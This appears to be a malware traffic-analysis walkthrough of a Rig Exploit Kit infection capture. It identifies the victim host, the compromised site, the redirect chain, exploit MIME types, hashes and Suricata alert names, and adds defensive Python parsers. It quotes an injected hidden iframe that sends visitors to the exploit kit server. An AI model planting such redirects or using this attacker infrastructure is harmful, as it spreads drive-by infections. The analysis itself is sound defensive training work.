Rig Exploit Kit - Traffic Analysis


Introduction

In this post, we inspect malicious traffic with Wireshark and take a close look at how threat actors use an Exploit Kit (EK) to mount multiple client-side exploitation attacks against hosts on the network.

The PCAP file can be downloaded here.

( Note: The password for .zip is: infected. )

( Credit: www.malware-traffic-analysis.net )

Table of Contents

  1. Traffic overview → Establish a general idea of what traffic we’re looking at.
  2. Q&A → Answer the questions on this page.

Traffic Overview

This phase helps us build a picture of the traffic environment we are working with.

Protocol Hierarchy

After opening the capture in Wireshark, we navigate to Statistics → Protocol Hierarchy.

ek1_ma/protocol_hierarchy.png

The output indicates that most of the traffic is HTTP. Hence, we’ll focus our attention on this protocol in the upcoming investigation.


IPv4 addresses

Let’s move on and inspect the unique IPv4 addresses.

From the Wireshark, we go to:

  • Statistics → IPv4 Statistics → All Addresses.

ek1_ma/ipv4_addresses.png

  • Four IP addresses are highlighted because they account for a high percentage of the traffic.

  • Two IP addresses in particular stand out as suspicious:

    • 37.200.69.143 → ~50%
    • 172.16.165.165 → 100%

Let’s keep them in mind since they might be useful for further analyses.


Resolved Address

Now, we continue by looking at the Resolved Addresses. In other words, these are the domain names of the HTTP web applications.

  • Statistics → Resolved Addresses → Hosts (instead of All entries)

The image below best illustrates the idea.

ek1_ma/dns.png

  • It’s worth noting that *.google.com and java.com are trusted domains.

  • That said, there is little value in investigating those domains unless the attacker managed to compromise either Google or Java, which I believe is not the case in this engagement.


Virus Total

Finally, we upload the .pcap file onto VirusTotal to potentially detect the attack classification.

ek1_ma/virustotal.png

The result implies that we might be dealing with a Client-Side Exploitation attack abusing Rig EK.

Note: More information on Rig EK can be found here.


Q&A

In this section, we conduct the analysis by following along with the questions.

Level 1

1) What is the IP address of the Windows VM that gets infected?

  • Answer: 172.16.165.165

Explain

  • 172.16.x.x belongs to a private IP address range.
  • Throughout the investigation, the IP address 172.16.165.165 is involved in all of the communication over HTTP.

ek1_ma/1_ans.png

Therefore, we can safely assume that it is the victim.


2) What is the host name of the Windows VM that gets infected?

  • Answer: K34EN6W3N-PC

Explain

  • In Wireshark, we can filter on either dhcp or nbns.

[1]. With dhcp, we proceed as follows:

ek1_ma/1_2_ans.png

[2]. With nbns, we simply type nbns in the filter bar.

ek1_ma/1_2_nbns.png


3) What is the MAC address of the infected VM?

  • Answer: f0:19:af:02:9b:f1

Explain

  • We already found the MAC address while looking for the machine’s host name.
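Both the host name (Q2) and the MAC address (Q3) come from the same DHCP message: the MAC is the chaddr field of the fixed header and the host name is option 12. The parser below is an added example, not code from the original post; the DHCPREQUEST it parses is constructed here using the values found above, not taken from the capture.

```python
import struct

DHCP_MAGIC = b"\x63\x82\x53\x63"
MESSAGE_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 5: "ACK"}

def build_dhcp_request(mac, hostname, requested_ip):
    """Build a minimal DHCPREQUEST. Constructed sample for this example,
    not a packet taken from the capture."""
    mac_bytes = bytes.fromhex(mac.replace(":", ""))
    # Fixed 236-byte header: op, htype, hlen, hops, xid, secs, flags,
    # ciaddr, yiaddr, siaddr, giaddr, chaddr(16), sname(64), file(128)
    fixed = struct.pack("!BBBBIHH4s4s4s4s16s64s128s", 1, 1, 6, 0, 0x3903F326,
                        0, 0, b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,
                        mac_bytes.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    options = (b"\x35\x01\x03"                                    # 53: REQUEST
               + b"\x3d\x07\x01" + mac_bytes                      # 61: client id
               + b"\x32\x04" + bytes(int(o) for o in requested_ip.split("."))  # 50
               + b"\x0c" + bytes([len(hostname)]) + hostname.encode("ascii")   # 12
               + b"\xff")                                         # end option
    return fixed + DHCP_MAGIC + options

def parse_dhcp(packet):
    """Return the fields an analyst pulls from a DHCP message: client MAC
    (chaddr), message type, host name (option 12), requested IP (option 50)."""
    if packet[236:240] != DHCP_MAGIC:
        raise ValueError("missing DHCP magic cookie")
    op, _htype, hlen = struct.unpack("!BBB", packet[:3])
    chaddr = packet[28:28 + hlen]                 # chaddr starts at offset 28
    result = {"op": op, "mac": ":".join(f"{b:02x}" for b in chaddr)}
    pos = 240
    while pos < len(packet):
        code = packet[pos]
        if code == 255:                           # end option
            break
        if code == 0:                             # pad option, no length byte
            pos += 1
            continue
        length = packet[pos + 1]
        data = packet[pos + 2:pos + 2 + length]
        pos += 2 + length
        if code == 53:
            result["type"] = MESSAGE_TYPES.get(data[0], str(data[0]))
        elif code == 12:
            result["hostname"] = data.decode("ascii", "replace")
        elif code == 50:
            result["requested_ip"] = ".".join(str(b) for b in data)
    return result

SAMPLE = build_dhcp_request("f0:19:af:02:9b:f1", "K34EN6W3N-PC", "172.16.165.165")
```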


4) What is the IP address of the compromised web site?

  • Answer: 82.150.140.30

5) What is the domain name of the compromised web site?

  • Answer: www.ciniholland.nl

Explain (Q4 & Q5)

  • Now, let’s examine the requests made by the victim at 172.16.165.165.

ek1_ma/1_4_ans.png

  • www.ciniholland.nl was the first web site the victim navigated to.

  • If we inspect the timeframe after the web site was fully loaded, we notice something strange.

ek1_ma/1_5_ans.png

  • Within 3 seconds, the victim made requests to two other, different sites.

  • If our theory is correct, some sort of redirection is happening behind the scenes. Bearing that in mind, we should test the theory in the subsequent investigation.


6) What is the IP address of the server that delivered the exploit kit and malware?

  • Answer: 37.200.69.143

7) What is the domain name that delivered the exploit kit and malware?

  • Answer: stand.trustandprobaterealty.com

Explain (Q6 & Q7)

  • The victim made a large number of connection attempts to the domain stand.trustandprobaterealty.com.
  • To view those connections, we filter the traffic with the following display filter: ip.src==172.16.165.165 and http.

ek1_ma/1_6_ans.png

  • Now that we assume the EK was delivered by stand.trustandprobaterealty.com, let’s look at further traffic between the malicious site and the victim.
  • The display filter is: ip.src==37.200.69.143 && ip.dst==172.16.165.165 && http

ek1_ma/1_7_ans.png

  • The MIME type application/x-msdownload indicates that an executable file is present in the response body.

  • In other words, the victim was unknowingly downloading an executable from the domain stand.trustandprobaterealty.com at that time.


Level 2

1) What is the redirect URL that points to the exploit kit (EK) landing page?

  • Answer: 24corp-shop.com

Explain

  • Looking back at the timeline, we notice that the page stand.trustandprobaterealty.com was loaded right after 24corp-shop.com.
  • We assume that some form of redirection leads the victim to land on the EK page.
  • Let’s further investigate the page source of the 24corp-shop.com domain.

[1]. We navigate to: File → Export Objects → HTTP.

[2]. In the window that pops up, we save the file as index.html.

ek1_ma/2_1_ans.png

[3]. Inspect index.html:

[...snip...]
<body bgcolor=#ffffff><div align='center'><iframe src='http://stand.trustandprobaterealty.com/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg|ZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM' border=0 width=125 height=10 scrolling=no></iframe></div> 
[...snip...]

As expected, the src attribute of the small iframe refers to the EK site.


2) Besides the landing page (which contains the CVE-2013-2551 IE exploit), what other exploit(s) were sent by the EK?

  • Answer: Flash and Java

Explain

  • Two other MIME types were served by the EK web site: application/x-shockwave-flash and application/java-archive.

ek1_ma/2_2_ans.png

  • They delivered the Adobe Flash and Java files, respectively, to the target system.


3) How many times was the payload delivered?

  • Answer: 3

Explain

  • Inspecting the following traffic, we can see that a payload of the same length, 401811 bytes, is delivered three times.

ek1_ma/2_3_ans.png


5) Submit the pcap to VirusTotal and find out which Snort alerts were triggered. What EK names are shown in the Suricata alerts?

Answer:

  • There are 6 alert classifications generated by Snort:
    1. Sensitive Data
    2. Potentially Bad Traffic
    3. Attempted User Privilege Gain
    4. A Network Trojan was detected
    5. Potential Corporate Privacy Violation
    6. Detection of a Denial of Service Attack

  • EK names shown in the Suricata alerts:
    1. ET CURRENT_EVENTS Cool/BHEK/Goon Applet with Alpha-Numeric Encoded HTML entity [2017064]
    2. ET CURRENT_EVENTS GoonEK encrypted binary (3) [2018297]
    3. ET CURRENT_EVENTS Goon/Infinity URI Struct EK Landing May 05 2014 [2018441]
    4. ET CURRENT_EVENTS RIG EK Landing URI Struct [2019072]
    6. ET CURRENT_EVENTS RIG EK Landing Page Sept 17 2014 [2019193]
    8. ET CURRENT_EVENTS RIG EK Landing March 20 2015 M2 [2020726]


Level 3

1) What file or page from the compromised website has the malicious script with the URL for the redirect?

  • Answer: /index.html of the compromised web site.

Explain

  • In the filter bar, we enter tcp.stream eq 6, then choose Follow TCP Stream.

ek1_ma/3_1_ans.png

  • Interestingly, a small embedded script refers to the 24corp-shop.com site.
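The redirect chain found in Level 2 Q1 (the tiny iframe in 24corp-shop.com’s index.html) and Level 3 Q1 (the injected script in the compromised site’s index.html) can be spotted mechanically: an iframe or script whose src points at a different host, especially when the iframe is sized so the user never sees it. The checker below is an added example, not code from the original post; the HTML it scans is a constructed sample modelled on the iframe shown above, with the session token replaced by a placeholder.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page, assumed to be served by 24corp-shop.com. The
# first iframe mirrors the one the walkthrough found; the others are
# ordinary content added so the checker has something benign to ignore.
SAMPLE_HTML = """<html><body bgcolor=#ffffff><div align='center'>
<iframe src='http://stand.trustandprobaterealty.com/?PHPSSESID=PLACEHOLDER'
 border=0 width=125 height=10 scrolling=no></iframe></div>
<script src='/static/site.js'></script>
<iframe src='https://www.youtube.com/embed/x' width=560 height=315></iframe>
</body></html>"""

class RedirectFinder(HTMLParser):
    """Flag iframes/scripts that pull content from another host, and iframes
    sized so small (both sides <= max_hidden_px) that a user would never see them."""
    def __init__(self, page_host, max_hidden_px=20):
        super().__init__()
        self.page_host = page_host
        self.max_hidden_px = max_hidden_px
        self.findings = []          # (tag, src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = dict(attrs)
        src = a.get("src")
        if not src:
            return
        reasons = []
        host = urlparse(src).hostname
        if host and host != self.page_host:
            reasons.append("off-domain src")
        if tag == "iframe" and a.get("width") is not None:
            try:
                w, h = int(a.get("width", "0")), int(a.get("height", "0"))
            except ValueError:
                w = h = 0
            if min(w, h) <= self.max_hidden_px:
                reasons.append(f"tiny iframe {w}x{h}")
        if reasons:
            self.findings.append((tag, src, reasons))

def find_redirects(html, page_host):
    """Return every iframe/script that looks like an injected redirect."""
    finder = RedirectFinder(page_host)
    finder.feed(html)
    return finder.findings
```

A hit carrying both reasons (off-domain and tiny) is the pattern seen in this capture; an off-domain iframe of normal size, like the video embed, is worth a look but is not by itself evidence of compromise.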


2) Extract the exploit file(s). What is(are) the md5 file hash(es)?

  • Answer:
    • Flash exploit: 7b3baa7d6bb3720f369219789e38d6ab
    • Java exploit: 1e34fdebbf655cebea78b45e43520ddf

Explain

  • We can download those exploits by navigating to:
    • File → Export Objects → HTTP, then Save.

ek1_ma/3_2_ans.png

  • Using the md5sum command on a Unix-like system, we can compute the MD5 hash of each file:
    $ md5sum flash
    7b3baa7d6bb3720f369219789e38d6ab  flash
    $ md5sum java
    1e34fdebbf655cebea78b45e43520ddf  java
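The Export Objects step used here and the repeated-payload count in Level 2 Q3 both amount to carving HTTP response bodies out of the stream, grouping them by MIME type and hashing them. The script below is an added example, not code from the original post; the HTTP stream it parses is constructed with dummy bodies (the real exploits and payload are not embedded), with the executable served three times as in the capture.

```python
import hashlib

# Server-to-client HTTP stream, constructed to mirror what the walkthrough
# exported: a landing page, a Java archive, a Flash file and one executable
# served three times. Bodies are dummy bytes, not real exploit content.
def _response(ctype, body):
    return (b"HTTP/1.1 200 OK\r\nContent-Type: " + ctype
            + b"\r\nContent-Length: " + str(len(body)).encode()
            + b"\r\n\r\n" + body)

SAMPLE_STREAM = (
    _response(b"text/html", b"<html>landing</html>")
    + _response(b"application/java-archive", b"PK\x03\x04" + b"J" * 60)
    + _response(b"application/x-shockwave-flash", b"CWS" + b"F" * 40)
    + _response(b"application/x-msdownload", b"MZ" + b"E" * 100)
    + _response(b"application/x-msdownload", b"MZ" + b"E" * 100)
    + _response(b"application/x-msdownload", b"MZ" + b"E" * 100)
)

INTERESTING = {"application/java-archive", "application/x-shockwave-flash",
               "application/x-msdownload"}

def extract_objects(stream):
    """Split a raw HTTP response stream on Content-Length into
    (content_type, body) pairs: the objects Export Objects -> HTTP lists."""
    objects, pos = [], 0
    while (end := stream.find(b"\r\n\r\n", pos)) >= 0:
        fields = {}
        for line in stream[pos:end].decode("latin-1").split("\r\n")[1:]:
            name, _, value = line.partition(":")
            fields[name.strip().lower()] = value.strip()
        length = int(fields.get("content-length", "0"))
        body = stream[end + 4:end + 4 + length]
        ctype = fields.get("content-type", "").split(";")[0].strip()
        objects.append((ctype, body))
        pos = end + 4 + length
    return objects

def summarize(stream):
    """Return {md5: (content_type, length, times_delivered)} for the exploit
    and payload MIME types, so repeated deliveries collapse onto one hash."""
    summary = {}
    for ctype, body in extract_objects(stream):
        if ctype not in INTERESTING:
            continue
        digest = hashlib.md5(body).hexdigest()
        seen = summary.get(digest, (ctype, len(body), 0))[2]
        summary[digest] = (ctype, len(body), seen + 1)
    return summary
```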
    

Conclusion

  • Throughout the analysis, we exposed the methodology used by the attackers.
  • While examining the HTTP communication, we also learned that an EK can automatically mount multiple exploits against the victim’s web browser without the user’s knowledge.